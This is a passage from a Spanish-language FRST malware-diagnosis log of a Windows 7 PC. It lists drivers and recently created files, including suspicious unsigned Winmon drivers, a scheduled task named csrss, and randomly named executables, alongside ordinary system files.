S3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [54272 2009-06-19] (Microsoft Windows -> Atheros Communications, Inc.)
S3 mdf15; C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys [12288 2010-03-18] () [Archivo no firmado]
S3 mvd21; C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys [64512 2010-06-14] () [Archivo no firmado]
R1 netfilter_v76; C:\Windows\System32\drivers\netfilter_v76.sys [66000 2015-04-11] (Anqing Inspector Software Ltd. -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S3 netr28ux; C:\Windows\System32\DRIVERS\netr28ux.sys [867328 2009-06-10] (Microsoft Windows -> Ralink Technology Corp.)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software s.r.o. -> Locktime Software)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 RSUSBSTOR; C:\Windows\System32\Drivers\RtsUStor.sys [216064 2009-06-04] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R1 SCDEmu; C:\Windows\System32\Drivers\SCDEmu.sys [90544 2009-07-26] (Fenghua Lee -> PowerISO Computing, Inc.)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-07-05] () [Archivo no firmado]
S3 StkTMini; C:\Windows\System32\Drivers\StkTMini.sys [528256 2007-11-15] (Syntek Semiconductor Ltd. -> Syntek)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapexpressvpn; C:\Windows\System32\DRIVERS\tapexpressvpn.sys [36208 2019-08-21] (ExprsVPN LLC -> The OpenVPN Project)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-05-16] (AnchorFree Inc -> Anchorfree Inc.)
S3 tapnordvpn; C:\Windows\System32\DRIVERS\tapnordvpn.sys [35592 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 tapse01; C:\Windows\System32\DRIVERS\tapse01.sys [39096 2014-12-02] (SurfEasy Inc -> The OpenVPN Project)
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2020-03-26] (WDKTestCert Admin,131480495282941941 -> ) [Archivo no firmado]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2020-03-26] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-03-26] (WDKTestCert Admin,131666266076831434 -> ) [Archivo no firmado]
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCIÓN
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 18:49 - 2020-03-26 18:51 - 000053709 _____ C:\Users\MARCO AVILA\Desktop\FRST.txt
2020-03-26 18:23 - 2020-03-26 18:23 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc
2020-03-26 18:21 - 2020-03-26 18:21 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-03-26 18:21 - 2020-03-26 18:21 - 000634432 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-03-26 16:36 - 2020-03-26 16:36 - 000001038 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-26 16:36 - 000001038 _____ C:\ProgramData\Desktop\Revo Uninstaller.lnk
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2020-03-26 16:36 - 2020-03-26 16:36 - 000000000 ____D C:\Program Files\VS Revo Group
2020-03-26 16:34 - 2020-03-26 16:34 - 007432520 _____ (VS Revo Group ) C:\Users\MARCO AVILA\Desktop\revosetup.exe
2020-03-26 14:26 - 2020-03-26 18:50 - 000000000 ____D C:\FRST
2020-03-26 14:22 - 2020-03-26 14:22 - 002279936 _____ (Farbar) C:\Users\MARCO AVILA\Desktop\FRST64.exe
2020-03-26 11:59 - 2020-03-26 12:00 - 000079550 _____ C:\Windows\ntbtlog.txt
2020-03-26 11:50 - 2020-03-26 11:50 - 000003176 _____ C:\Windows\system32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A}
2020-03-26 11:43 - 2020-03-26 11:43 - 000000000 ____D C:\Windows\system32\Tasks\System
2020-03-26 11:40 - 2020-03-26 18:21 - 000003532 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-03-26 11:40 - 2020-03-26 18:21 - 000003200 _____ C:\Windows\system32\Tasks\csrss
2020-03-26 11:40 - 2020-03-26 11:43 - 000000000 ____D C:\ProgramData\ErrorResponder
2020-03-26 11:40 - 2020-03-26 11:40 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000000000 ___HD C:\Windows\rss
2020-03-26 11:40 - 2020-03-26 11:40 - 000000000 ____D C:\Program Files (x86)\Orchestrale
2020-03-26 11:39 - 2020-03-26 18:40 - 000000510 _____ C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 000002948 _____ C:\Windows\system32\Tasks\Adobe Flash sdk Files Update up_2020326
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Oded
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Newf
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Komare
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:38 - 2020-03-26 11:38 - 000000000 ____D C:\Program Files (x86)\kiss
2020-03-26 11:35 - 2020-03-26 11:35 - 000000000 ____D C:\Program Files (x86)\MaRS
2020-03-26 11:33 - 2020-03-26 11:34 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2020-03-26 11:33 - 2020-03-26 11:34 - 000000000 ____D C:\ProgramData\Logic Cramble
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ C:\Users\MARCO AVILA\AppData\Local\Config.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000000000 ____D C:\ProgramData\CloudPrinter
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:28 - 2020-03-26 11:48 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\inetinfoservice
2020-03-25 18:28 - 2020-03-26 11:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\TimerUtc
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\PatchMyPC
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\Patch_My_PC,_LLC
2020-03-25 16:27 - 2020-03-25 16:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\cache
2020-03-25 16:10 - 2020-03-25 16:10 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbam
2020-03-25 16:09 - 2020-03-25 16:13 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbamtray
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2020-03-25 16:08 - 2020-03-25 16:08 - 000000000 ____D C:\ProgramData\MB2Migration
2020-03-25 14:28 - 2016-09-02 09:40 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:35 - 000706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-03-25 14:28 - 2016-09-02 09:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-03-25 14:28 - 2016-09-02 09:31 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 001464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-03-25 14:28 - 2016-09-02 09:21 - 003944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:18 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:02 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-03-25 14:28 - 2016-09-02 08:58 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-03-25 14:28 - 2016-09-02 08:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-03-25 14:28 - 2016-06-06 10:50 - 001483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-03-25 14:28 - 2016-06-06 09:23 - 001176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-03-25 14:28 - 2016-05-13 16:07 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2020-03-25 14:28 - 2016-05-13 15:55 - 002607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-03-25 14:28 - 2016-05-13 15:52 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:38 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-03-25 14:28 - 2016-05-12 11:14 - 000862208 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 09:18 - 000572416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 07:05 - 000459640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2020-03-25 14:28 - 2016-05-12 07:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-12 07:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-04 11:21 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2020-03-25 14:28 - 2016-05-04 11:17 - 003244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-03-25 14:28 - 2016-05-04 11:17 - 002365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-03-25 14:28 - 2016-05-04 09:04 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2020-03-25 14:28 - 2016-02-05 12:56 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2020-03-25 14:28 - 2016-02-05 12:54 - 000109568 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-03-25 14:28 - 2016-02-05 11:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbs.dll
2020-03-25 14:28 - 2015-06-03 14:21 - 000451080 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
